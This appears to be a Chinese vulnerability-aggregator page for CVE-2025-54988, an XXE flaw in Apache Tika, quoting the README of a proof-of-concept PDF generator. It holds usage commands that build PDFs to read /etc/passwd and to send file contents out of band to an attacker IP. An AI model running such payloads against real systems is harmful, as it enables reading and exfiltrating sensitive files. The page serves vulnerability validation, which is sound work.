关联漏洞
标题:
Apache Tika 安全漏洞
(CVE-2025-54988)
描述:Apache Tika是美国阿帕奇(Apache)基金会的一个集成了POI(使用Java程序对MicrosoftOffice格式文档提供读和写功能的开源函数库)、Pdfbox(读取和创建PDF文档的纯Java类库)并为文本抽取工作提供了统一界面的内容抽取工具集合。 Apache Tika 1.13版本至3.2.1版本存在安全漏洞,该漏洞源于XML外部实体注入,可能导致读取敏感数据或触发恶意请求。
描述
A PDF generator for CVE-2025-54988
介绍
# CVE-2025-54988 - POC
Disclaimer: I am not the original discoverer of this vulnerability. This post documents my process of reproducing the issue in a controlled environment for educational purposes and to help others validate their own systems.
The tests were conducted in an isolated lab with no impact to production systems.
Usage:
```
python3 xfa_xxe_poc_gen.py --mode file --file /etc/passwd -o xfa_passwd.pdf
python3 xfa_xxe_poc_gen.py --mode oob --ip 127.0.0.1 --port 8888 --write-dtd -o xfa_oob.pdf
python3 xfa_xxe_poc_gen.py --mode oob --ip 10.10.14.3 --port 8080 --oob-file /etc/hostname --param d
```
<img width="1845" height="719" alt="image" src="https://github.com/user-attachments/assets/fb7f27a8-28c8-4131-b27e-25ccab0af838" />
文件快照
[4.0K] /data/pocs/34fb2b52b2daff87fc813705bcc409f4dbcc89dd
├── [ 749] README.md
├── [1010] xfa_passwd.pdf
└── [5.9K] xfa_xxe_poc_gen.py
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。